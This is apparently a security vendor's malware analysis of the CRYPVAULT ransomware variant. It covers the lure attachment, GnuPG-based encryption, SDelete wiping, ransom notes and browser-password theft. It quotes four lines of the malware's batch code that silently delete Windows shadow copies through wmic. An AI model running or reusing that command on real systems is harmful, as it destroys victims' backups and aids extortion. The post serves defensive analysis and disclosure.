We uncovered a new crypto-ransomware variant with new routines that include making encrypted files appear as if they were quarantined files. These files are appended by a *.VAULT file extension, an antivirus software service that keeps any quarantined files for a certain period of time. Antivirus software typically quarantines files that may potentially cause further damage to an infected system.
- Crypto-ransomware detected as BAT_CRYPVAULT.A
- SDelete – Microsoft Sysinternals tool (will be renamed to audiodg.exe by the malware)
- GnuPG – executable open-source encryption tool (will be renamed to svchost.exe by the malware)
- Library file of GnuPG (will be renamed to iconv.dll by the malware)
The script will execute the crypto-ransomware after downloading the files mentioned above. The downloaded files are then saved in the %User Temp% folder.
Figure 1. Email attachment named – Akt_Sverki_za_2014_year_Buhgalterija_SIGNED-ot_17.02_2015g_attachment.AVG.Checked.OK.pdf.js
I observed that the cybercriminals may have purposely added strings found in known virus scanner logs (such as in AVG, Microsoft, etc.) in order to bypass their scan engines.
Upon execution, the malware installs an open source encryption tool called GNU Private Guard (GnuPG) into the affected system, which starts the encryption process. This file will generate an RSA-1024 public and private key pair used in the encryption of user files.
Figure 2. Generated files of GnuPG (private – secring.gpg and public – pubring.gpg)
It then looks for files to encrypt. The files extensions it targets are as follows:
Figure 3. The malware searches for files from its list of file extensions and encrypts the file using dropped file by the malware called svchost.exe (a GnuPG executable)
(Click to enlarge image)
The malware avoids this list of folders to avoid system malfunction:
- com_ intel
After encrypting the user’s files, the malware will then append a *.vault file extension.
The malware uses the following script to make the affected system display the ransom note when the file is opened:
Figure 4: Script used by the malware to display the ransom note
(Click to enlarge image)
After encryption, the malware will change all associated *.vault file extensions to padlock icons. Each “locked” and encrypted file will display a ransom note when opened, as displayed in the image below.
Figure 5. Opening any of the files encrypted by BAT_CRYPVAULT.A leads to a ransom note displayed by VaultCrypt. Users will need to upload the Vault key file that the malware drops in the desktop folder to gain access to the site.
The malware also drops a .TXT file and displays a message on the infected system’s desktop instructing users on how to pay the ransom price in order to decrypt the files. We observed that this particular attack appears to target users in Russian-speaking countries as the attached file name, ransom note, and ransomware support portal are all in Russian.
Figure 6. The dropped file VAULT.txt written in Russian is found in the Desktop folder. It provides instructions how to decrypt the files.
Figure 7. Ransom note via an HTML executable file (.HTA file) that is displayed on infected system’s desktop after the encryption of user’s files
Deleting backup, traces of encryption, and malware components
The malware deletes key files, secring.gpg, vaultkey.vlt and confclean.lst by using sDelete. a Microsoft Sysinternals tool. sDelete is is capable of overwriting a deleted file’s disk data that makes it difficult or nearly impossible to recover deleted files
Though this isn’t the first time we’re seeing SDelete being used in crypto-ransomware attacks, it appears that this is a first for malware to use 16 overwrite passes to make sure that recovery tools will have a hard time trying reconstructing the deleted file. This file arrives in the affected system together with the ransomware.
Figure 8. Key files deleted that were used in the encryption process
Figure 9. The malware deletes the key files using sDelete
The malware deletes shadow volume copies if it exists in the system.
echo Set objShell = CreateObject^(“Shell.Application”^) > “%temp%\win.vbs”
echo Set objWshShell = WScript.CreateObject^(“WScript.Shell”^) >> “%temp%\win.vbs”
echo Set objWshProcessEnv = objWshShell.Environment^(“PROCESS”^) >> “%temp%\win.vbs”
echo objShell.ShellExecute “wmic.exe”, “shadowcopy delete /nointeractive”, “”, “runas”, 0 >> “%temp%\win.vbs”
Figure 10. The malware deletes its components at the end of its routine
Downloads info-stealing malware
The malware also downloads and executes a hacking tool called Browser Password Dump by SecurityXploded from its C&C server. The tool is capable of extracting stored login passwords from the following web browsers:
- Mozilla Firefox
- Internet Explorer
- Google Chrome
- Opera Browser
- SRWare Iron
- Comodo Dragon
After execution of the tool, the malware resumes control and drops a visual basic script called up.vbs that will upload the password dump report back to the C&C server.
We’ve also noticed that despite being a new crypto-ransomware variant, CRYPVAULT appears to possess limited functionalities as it is not coded using programming language; rather was written in a batch script. It also doesn’t import any libraries or create functions, and the components that come with the malware carry out the bulk of its malicious routines. This shows how easy it is for cybercriminals to create new crypto-ransomware variants.
Ransomware is becoming the next big thing that the threat actors create. Making important user files unusable forces more people to pay the ransom. As more ransomware appear in the wild, it is advised to back up files on a regular basis.
Update as of April 7, 2015, 11:00 P.M. PST:
We have edited the first paragraph of the entry to clarify a statement about the quarantined files.
Credit goes to keydet89 (@keydet89), Ryan Kazanciyan (@ryankaz42), and InfoSec Taylor Swift (@SwiftonSecurity) for initiating a discussion about the description of the files.